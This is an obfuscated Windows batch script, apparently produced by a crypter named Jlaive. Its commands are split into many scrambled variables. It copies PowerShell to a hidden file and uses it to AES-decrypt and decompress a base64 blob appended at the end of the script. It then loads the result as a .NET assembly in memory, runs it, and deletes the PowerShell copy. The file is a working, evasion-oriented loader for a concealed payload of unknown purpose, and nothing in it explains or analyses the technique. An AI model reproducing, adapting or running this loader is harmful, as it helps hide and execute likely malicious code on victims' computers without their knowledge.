@echo off
echo F|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%~dp0%~nx0.exe" /y
attrib +s +h "%~dp0%~nx0.exe"
cls
cd %~dp0
set "vzYdbZYSnW=etString([" && set "NCwBGcgNCC=gaVpucGJhK"
set "XJgdDAkkyV=XNpID0gbmV" && set "CgfiYkwcBG=lY3J5cHRvc"
set "LXkdPIrkar=tc28uRGlzc" && set "OiZdQIiDlM=yBNZW1vcnl" && set "vKodabvSKw=GtleSwgYnl"
set "rlFFsEbvUi=SB7IEFlc01"
set "XxImdqoGEe=S5QS0NTNzs" && set "gWZSQjECJk=gYWVzLk1vZ" && set "LysCahimaf=XIHsgcHVib" && set "YFxDrcOeLo=5c3RlbS5JT" && set "BQJkLfzUCF=rem https:"
set "rAqsAOBWPU=vY2soaW5wd" && set "wfwCTwnyUS=ing($avHqD"
set "QrdNxfDiEG=ybSBkZWNye" && set "kTgQKhZdEG=G9zZSgpOyB" && set "QxqTMUEGKM=lj7kdnquS/" && set "xUzEigPKvU=ssembly]::" && set "REGVoRpECC=nW]::iZnpb"
set "BdNziySOVq=ncy5Db3B5V" && set "eOZcllboUW=5cHRvZ3Jhc"
set "AVdPbqUadn=yYW5zZm9yb"
set "MiqlIoizkS=]::ReadAll" && set "BkizAMahys=pd = [Syst"
set "BeRzxElkGl=yBieXRlW10"
set "TqwvkXdkOj=oint.Invok"
set "VlgbfYMyoE=mBase64Str"
set "XTILEqvdCJ=0cmVhbSBtc"
set "YNOelNFSBU=lO0='), [S"
set "uxRFZSQeah=g]::UTF8.G"
set "ypvLjemUia=flection.A"
set "nliHfNzqvE=XNpbmcgU3l" && set "ZYsydLNmhA=7IHZhciBnc"
set "jAgbbEOmGO=::HMwJyQ([" && set "lItVVUinzF=onpolicy b"
set "gCVONjNPLU=y5Db21wcmV"
set "INMDLhEuuV=))).EntryP"
set "NJZLIxZmWK=SB9'));Add"
set "iHhbtkXEea=lLkRlY29tc"
set "ZuqhRNgXUK=GJ5dGVbXSB" && set "BAaIepGEOh=Ea6BKMW5QM" && set "XKnbhjCkOq=28gPSBuZXc"
set "TCsMyBbUvq=KD8VCkqvTk" && set "ftkDWEqxki=G9zZSgpOyB" && set "CfurUHokqz=//github.c" && set "UkBHghBkqA=om/ch2sh/J"
set "hloATdCWhx=GUgPSBDaXB" && set "ZfPTTDUeCs=XB0b3IgPSB"
set "rePubapmFk=WVzID0gbmV" && set "TEqTpuMZka=G9zZSgpOyB"
set "AlRlZiOKEm=3IEFlc01hb"
set "MZiROMCSna=ing('dXNpb" && set "sdszuXHZSF=WFtKG1zaSw"
set "hNANFRekSG=wdG9yKGtle"
set "ObHTGcpcUy=$snJXJZ = "
set "satIGwqsGZ=zLlBhZGRpb"
set "aBSNejbCLc=c), [Syste" && set "QBCJZGUGnS=ypass -com" && set "JJenIGyZey=tc2kuRGlzc"
set "eqnIGUwUkq=a([EFcvnW]" && set "MWtoIakWtq=[System.Re"
set "SpUvbZkCoj=yA9IG5ldyB"
set "wwtJdJEeCi=kID0gZGVjc" && set "oTJlAdaEme=, [string[" && set "vluZrlkiyf=0ZW0uU2Vjd"
set "vPeaQOLtCi=hZXMuQ3JlY"
set "cKYHkMaPEm=]] ('%*')))" && set "glfPEDoECM=yZXR1cm4gb"
set "VRRQEzmWpf=UZpbmFsQmx"
set "IjNUIkaNLa=jA9vSoSa45"
set "wgQcEikWsC=GVjcnlwdGV" && set "QElMYrBPKD=-noprofile"
set "CUnrzWwUyG=ert]::From"
set "tyzpWKkGQZ=laive" && set "zVYAbTiuEy=0ZVtdIGl2K" && set "rgrofycTnm=m.Convert]"
set "NqMBoZkmCj=ieXRlcykge"
set "IsWdGvZKiR=gZ3MuRGlzc"
set "MVSExoLnUC=GljIHN0YXR" && set "agYqqoMMke=em.IO.File"
set "dKHdHGqUiC=mcgPSBQYWR" && set "JcTXokqEaF=y5EaXNwb3N" && set "DJMajmRMGk=e($null, ("
set "xyNGomHfEq=64String('" && set "WlQelOkSzF=ieXRlcyk7I"
set "WpdpCXgnDq=E1lbW9yeVN" && set "wbTaeGTDeE=Text('%~f0').Split([Environment]::NewLine);$avHqDc " && set "wpVrEMryUu=saWMgY2xhc"
set "TrMIenkWIG=vert]::Fro" && set "nkGGCCeKQk=SBpbnB1dCw" && set "EchGUOqkuQ=zdGVtLklPO" && set "SGLYKGtbEy=3Npb25Nb2R" && set "vhLFbfZEaK=3RyZWFtKCk"
set "nLefgPEIZE=XNvLlRvQXJ" && set "HcfQKjWXUW=G8obXNvKTs" && set "qiAevTtUSk=eDefinitio" && set "DdvUmOCkeA=System.Con"
set "LooRybqEGT=10gSE13Snl" && set "xCyGEtmCHU=ng('bVH234"
set "pmZdcoUKYS=mBase64Str" && set "nxsULFGVLU=$fvWFpd.Le"
set "InnPJtGEaY=lKCk7IGFlc" && set "EsucPwxEyp=gTWVtb3J5U"
set "psxUqSUyUg=XRlRGVjcnl"
set "QFazNlXUeE=" && set "JloYqwSETU=zc2lvbjt1c" && set "LnepzObwOk=  -executi" && set "gEtouRqJEy=%~nx0.exe "
set "NNlJHobUSx=xt.Encodin"
set "TUdXVHLqUe=3MgRUZjdm5" && set "rSfZSWbEGU=oZXJNb2RlL"
set "WrvpwDsNOC=XJpdHkuQ3J"
set "wwKSAfkuxk=HVybiBkZWN"
set "jcvuneZkaK=3IE1lbW9ye" && set "jLgacmSUgm=Load([EFcv" && set "UtPEowJEOC=gQ29tcHJlc"
set "MVvDWevTki=mand $fvWF" && set "OJWauORjke=ucHV0Lkxlb" && set "BRdvkVYUnY=HJlc3MpOyB" && set "WxDPIuTUry=md0aCk7IGR" && set "wKHFojzdES=vert]::Fro" && set "ONtMMYVtkq=Base64Stri" && set "ZqrSzeEuqk== $fvWFpd["
set "whqrdPSkOt=i5EaXNwb3N" && set "sapmsGJpku=3VzaW5nIFN" && set "CdTQLbcDeK=gSUNyeXB0b" && set "pdxTqbrCyw=::FromBase" && set "jvdYUplmdy=yYXkoKTsgf"
set "gRECGRuWmw=tLlRleHQ7d" && set "bnVzgigGPU=H0gcHVibGl"
set "iJUzvxqQdU=jIHN0YXRpY" && set "rVUhHDlUkS=TdHJlYW0gb"
set "tnTZduDHkK=mFnZWQoKTs" && set "avxFWPKFBE=kNCQzsgYWV" && set "FGpWGICUOS=ieXRlW10gZ" && set "OYCTyfZoBm=kaW5nTW9kZ"
set "bULWSsibEW=13idcI74oT" && set "hbuesZGcku=hbmFnZWQgY" && set "DgptThdCqm=RKGJ5dGVbX"
set "kYNcsOBMUK=2luZyBTeXN"
set "ucBwUuRUGp=yeXB0ZWQ7I" && set "jzLIbvqUKx=Gh5OyBwdWJ"
set "QpMlbQEmxw=pYyBieXRlW"
set "jHGaoRuaVk=-Type -Typ" && set "qVBiKIyxjW=ystem.Conv"
set "PTxYKUmfkj=HWmlwU3RyZ"
set "WDIzagDZku=gYnl0ZVtdI"
set "wReCGVWypE=SwgaXYpOyB"
set "DKhdYeNHaC=lKCk7IHJld" && set "gVYRONEqSo=mcgU3lzdGV"
set "GXnXuEiDAC=1RyYW5zZm9" && set "BHoAvuIbUe=/rEOAA==')"
set "rybHvBUrKr=XQsIDAsIGl"
set "MleusDkkSz=n $snJXJZ;"
set "dnDWXgZaxa=System.Con"
set "hyilqtYkDv=VN0cmVhbSh" && set "VHtDIaKiCR=ngth - 1];"
set "lhTRReASMF=[System.Te"
set "nxkQgvUKhn=nlwdG9yLlR"
%BQJkLfzUCF%%CfurUHokqz%%UkBHghBkqA%%tyzpWKkGQZ%
%gEtouRqJEy%%QElMYrBPKD%%LnepzObwOk%%lItVVUinzF%%QBCJZGUGnS%%MVvDWevTki%%BkizAMahys%%agYqqoMMke%%MiqlIoizkS%%wbTaeGTDeE%%ZqrSzeEuqk%%nxsULFGVLU%%VHtDIaKiCR%%ObHTGcpcUy%%lhTRReASMF%%NNlJHobUSx%%uxRFZSQeah%%vzYdbZYSnW%%dnDWXgZaxa%%TrMIenkWIG%%pmZdcoUKYS%%MZiROMCSna%%gVYRONEqSo%%gRECGRuWmw%%nliHfNzqvE%%EchGUOqkuQ%%sapmsGJpku%%YFxDrcOeLo%%gCVONjNPLU%%JloYqwSETU%%kYNcsOBMUK%%vluZrlkiyf%%WrvpwDsNOC%%eOZcllboUW%%jzLIbvqUKx%%wpVrEMryUu%%TUdXVHLqUe%%LysCahimaf%%MVSExoLnUC%%QpMlbQEmxw%%LooRybqEGT%%DgptThdCqm%%nkGGCCeKQk%%WDIzagDZku%%vKodabvSKw%%zVYAbTiuEy%%rlFFsEbvUi%%hbuesZGcku%%rePubapmFk%%AlRlZiOKEm%%tnTZduDHkK%%gWZSQjECJk%%hloATdCWhx%%rSfZSWbEGU%%avxFWPKFBE%%satIGwqsGZ%%dKHdHGqUiC%%OYCTyfZoBm%%XxImdqoGEe%%CdTQLbcDeK%%GXnXuEiDAC%%QrdNxfDiEG%%ZfPTTDUeCs%%vPeaQOLtCi%%psxUqSUyUg%%hNANFRekSG%%wReCGVWypE%%FGpWGICUOS%%wgQcEikWsC%%wwtJdJEeCi%%nxkQgvUKhn%%AVdPbqUadn%%VRRQEzmWpf%%rAqsAOBWPU%%rybHvBUrKr%%OJWauORjke%%WxDPIuTUry%%CgfiYkwcBG%%whqrdPSkOt%%InnPJtGEaY%%JcTXokqEaF%%DKhdYeNHaC%%wwKSAfkuxk%%ucBwUuRUGp%%bnVzgigGPU%%iJUzvxqQdU%%BeRzxElkGl%%NCwBGcgNCC%%ZuqhRNgXUK%%NqMBoZkmCj%%OiZdQIiDlM%%rVUhHDlUkS%%XJgdDAkkyV%%jcvuneZkaK%%hyilqtYkDv%%WlQelOkSzF%%WpdpCXgnDq%%XTILEqvdCJ%%XKnbhjCkOq%%EsucPwxEyp%%vhLFbfZEaK%%ZYsydLNmhA%%SpUvbZkCoj%%PTxYKUmfkj%%sdszuXHZSF%%UtPEowJEOC%%SGLYKGtbEy%%iHhbtkXEea%%BRdvkVYUnY%%BdNziySOVq%%HcfQKjWXUW%%IsWdGvZKiR%%kTgQKhZdEG%%JJenIGyZey%%ftkDWEqxki%%LXkdPIrkar%%TEqTpuMZka%%glfPEDoECM%%nLefgPEIZE%%jvdYUplmdy%%NJZLIxZmWK%%jHGaoRuaVk%%qiAevTtUSk%%MleusDkkSz%%MWtoIakWtq%%ypvLjemUia%%xUzEigPKvU%%jLgacmSUgm%%REGVoRpECC%%eqnIGUwUkq%%jAgbbEOmGO%%DdvUmOCkeA%%wKHFojzdES%%VlgbfYMyoE%%wfwCTwnyUS%%aBSNejbCLc%%rgrofycTnm%%pdxTqbrCyw%%xyNGomHfEq%%QxqTMUEGKM%%BAaIepGEOh%%bULWSsibEW%%TCsMyBbUvq%%YNOelNFSBU%%qVBiKIyxjW%%CUnrzWwUyG%%ONtMMYVtkq%%xCyGEtmCHU%%IjNUIkaNLa%%BHoAvuIbUe%%INMDLhEuuV%%TqwvkXdkOj%%DJMajmRMGk%%oTJlAdaEme%%cKYHkMaPEm%
%QFazNlXUeE%
attrib -s -h "%~dp0%~nx0.exe"
del "%~dp0%~nx0.exe"
exit /b
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